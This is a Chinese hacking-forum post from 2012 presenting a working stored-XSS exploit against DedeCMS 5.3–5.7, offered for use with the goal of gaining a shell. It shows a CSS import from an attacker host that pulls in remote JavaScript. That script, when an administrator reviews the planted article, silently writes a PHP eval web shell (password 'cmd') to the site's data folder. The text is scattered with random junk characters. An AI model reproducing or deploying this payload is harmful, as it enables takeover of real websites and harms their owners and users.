找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1791|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
  g7 M% c6 w- W5 ^7 s为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)4 Y! `& o& x" s  @* q, @/ {
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
5 K6 P) y! a* q  E下面说说利用方法。
2 |& j: X/ Y8 t. w# r条件有2个:
& E2 f6 E7 X/ `" x1.开启注册
' e9 F1 f9 i9 X. ^4 j2.开启投稿
: q6 u' i  r4 A; Q注册会员----发表文章
! N. d% G4 r# @* l8 y/ i( Y内容填写:
) \2 @) y3 p8 D( s& q复制代码
# P7 Q5 w5 I+ K. ^* y9 s<style>@im\port'\http://xxx.com/xss.css';</style>
8 [$ R( y$ K. W% Y* _% I新建XSS.Css- [( ^) g% }# |6 X6 R$ W9 K
复制代码0 ^9 t0 a6 h% r5 m$ X( j( J
.body{# n" J' b% h* B
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
! Y; s4 @  e; }  T0 l: Y$ r新建xss.js 内容为
, o4 [8 H! F7 b4 N复制代码
9 V3 s7 w" c6 g1.var request = false;5 A* f- `4 A' ]' ]' s
2.if(window.XMLHttpRequest) {3 C( F0 |7 @( \# ]. g
3.request = new XMLHttpRequest();! u! [: ?( q3 ]. V- i5 S
4.if(request.overrideMimeType) {$ L8 B; Z( J2 U  g
5.request.overrideMimeType('text/xml');
* `3 F1 _9 O* G( ~2 U7 ]+ f& ~6.}5 Z7 L, J6 I% y: W+ \2 C& p5 p) N
7.} else if(window.ActiveXObject) {0 {  U3 n1 C% N
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];3 X% K3 c# a6 a
9.for(var i=0; i<versions.length; i++) {) t* k/ L/ ^% _
10.try {; ^* j. X1 ^8 p% q! b  {- V/ z: g
11.request = new ActiveXObject(versions);  o4 G' z! ^2 ]' P! Y
12.} catch(e) {}
9 T/ l/ f# ?& L& l2 O4 h13.}( W: v7 V$ w$ o) l. r
14.}
3 H0 w$ W7 w2 \15.xmlhttp=request;) ?  X$ ?" A" T7 p( b# P5 ?
16.function getFolder( url ){; i. j) a, }2 i
17. obj = url.split('/')
7 t- g+ o9 [! N/ Y. z18. return obj[obj.length-2]+ G+ N3 T9 t4 D% t' }* a$ U( a
19.}( w* y7 ^5 T+ r4 q1 c+ y! N
20.oUrl = top.location.href;* v* U/ s2 ^7 {; I' |
21.u = getFolder(oUrl);
+ k9 \5 O+ F9 e. A0 S2 b22.add_admin();
1 T% Z, x( T+ ?4 n& @6 a5 h23.function add_admin(){
6 F  [) i$ l3 B; u4 D' B24.var url= "/"+u+"/sys_sql_query.php";
: d; |) w) m* k+ w& I25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";4 v  g- ~& C8 D6 e, |7 R' M
26.xmlhttp.open("POST", url, true);9 H: L1 M8 p  K5 l- r% @
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
4 C- N6 N+ G9 O' V28.xmlhttp.setRequestHeader("Content-length", params.length);! Y- S) Z) @3 }# e" J5 H% s/ x
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
! {8 [& n) _' W  i0 Q30.xmlhttp.send(params);
" T# U9 X' Z3 U31.}. F+ N0 ]  a2 Y' K% V6 |+ V
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表